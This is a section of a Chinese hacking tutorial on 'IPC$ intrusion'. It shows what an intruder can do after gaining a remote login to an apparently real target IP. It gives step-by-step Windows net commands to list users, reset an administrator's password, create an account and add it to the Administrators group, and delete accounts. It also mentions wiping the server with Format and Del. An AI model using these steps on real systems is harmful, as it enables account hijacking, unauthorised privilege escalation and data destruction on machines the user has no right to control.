6.1 IPC$漏洞入侵(3)

    

6.1.3  基于IPC$高级入侵

6.1.2小节讲述了通过NCX99建立远程登录，接下来将看看入侵者利用远程登录能做些什么？

注意：

本节前提是已远程登录到服务器。

入侵测试：

测试主机：61.150.115.9

(1) 查看目标机所有用户列表，在远程的命令提示符下运行如下命令格式：

net user

输入完毕后按Enter键，系统便会列出用户列表，如图6-22所示。

图6-22  列出目标机的用户列表

(2) 查看某个用户信息，在远程的命令提示符下运行如下命令格式：

net user system32

命令解释：

查看用户名为system32的用户属性。

输入完毕后按Enter键，接着系统会列出该用户的一些信息，如图6-23所示。

图6-23  列出用户system32的信息

从本地组会员中可以看出该用户隶属于Administrators组，也就是超级用户，对计算机有完全操作的权力。

(3) 入侵者还可以更改用户密码，在命令提示符下输入如下格式：

net user system32 hacker1219

命令解释：

将用户名system32的密码更改为：hacker1219。

输入完毕后按Enter键，接着会显示命令成功完成，如图6-24所示。

图6-24  更改用户密码

(4) 在目标机上添加用户可以在命令提示符下输入如下格式：

net user admin system /add

命令解释：

添加一个用户名为system的用户，并设密码为system。

输入完毕后按Enter键，接着会显示命令成功完成，如图6-25所示。

图6-25  向目标服务器添加用户

刚添加的用户Admin隶属于Users组，使用如下命令查看：

net user admin

输入完毕后按Enter键，如图6-26所示。

图6-26  查看用户Admin的属性

(5) 在远程登录目标机后提升用户权限时可在命令提示符下输入如下格式：

net localgroup administrators admin /add

命令解释：

将用户Admin添加到Administrators组里。

输入完毕后按Enter键，接着会显示命令成功完成，如图6-27所示。

图6-27  提升用户权限

(6) 如果需要在远程登录目标机后删除用户可在命令提示符下输入如下格式命令：

net user admin /delete

命令解释：

删除用户Admin。

输入完毕后按Enter键，接着会显示命令成功完成，如图6-28所示。

图6-28  删除用户

入侵者甚至可以使用Format、Del等命令，对目标服务器进行破坏，也会启动和停止服务器的某些服务，从而使系统面临着巨大的危险。